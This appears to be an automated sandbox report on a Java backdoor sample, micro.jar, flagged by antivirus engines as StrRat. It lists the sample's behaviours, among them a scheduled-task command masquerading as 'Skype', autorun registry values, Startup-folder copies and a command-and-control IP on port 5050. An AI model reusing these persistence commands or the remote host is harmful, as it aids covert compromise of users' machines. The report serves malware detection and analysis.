file	C:\Users\test22\AppData\Local\Temp\jna--877171118\jna1049267807408521846.dll

Creates a suspicious process (2 events)

cmdline	cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\test22\AppData\Roaming\micro.jar"
cmdline	schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\test22\AppData\Roaming\micro.jar"

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\jna--877171118\jna2477946155262815302.dll
file	C:\Users\test22\AppData\Local\Temp\jna--877171118\jna4115874404283386990.dll

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 19, 2021, 9:18 a.m.	process_identifier: 1040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 65536 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x16200000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 19, 2021, 9:18 a.m.	flags: 28 family: 0	1	0	0

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\test22\AppData\Roaming\micro.jar"
cmdline	schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\test22\AppData\Roaming\micro.jar"

Communicates with host for which no DNS query was performed (1 event)

host

173.209.48.226

Installs itself for autorun at Windows startup (6 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\micro	reg_value	"C:\Program Files (x86)\Java\jre1.8.0_131\bin\javaw.exe" -jar "C:\Users\test22\AppData\Roaming\micro.jar"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\micro	reg_value	"C:\Program Files (x86)\Java\jre1.8.0_131\bin\javaw.exe" -jar "C:\Users\test22\AppData\Roaming\micro.jar"
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\micro.jar
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\micro.jar
cmdline	cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\test22\AppData\Roaming\micro.jar"
cmdline	schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\test22\AppData\Roaming\micro.jar"

File has been identified by 15 AntiVirus engines on VirusTotal as malicious (15 events)

MicroWorld-eScan	Trojan.Java.Agent.BPM
Arcabit	Trojan.Java.Agent.BPM
Cyren	Java/Agent.BLN
ESET-NOD32	multiple detections
BitDefender	Trojan.Java.Agent.BPM
NANO-Antivirus	Exploit.Zip.Heuristic-java.csrvpr
Ad-Aware	Trojan.Java.Agent.BPM
Emsisoft	Trojan.Java.Agent.BPM (B)
DrWeb	Java.Siggen.498
FireEye	Trojan.Java.Agent.BPM
Ikarus	Exploit.JAVA.SpyAgent
GData	Java.Backdoor.StrRat.C
Avira	EXP/JAVA.Banload.VPB.Gen
Cynet	Malicious (score: 99)
MAX	malware (ai score=89)

The process java.exe wrote an executable file to disk (2 events)

file	C:\Users\test22\AppData\Local\Temp\jna--877171118\jna2477946155262815302.dll
file	C:\Users\test22\AppData\Local\Temp\jna--877171118\jna1049267807408521846.dll

Generates some ICMP traffic

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

173.209.48.226:5050

micro.jar

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All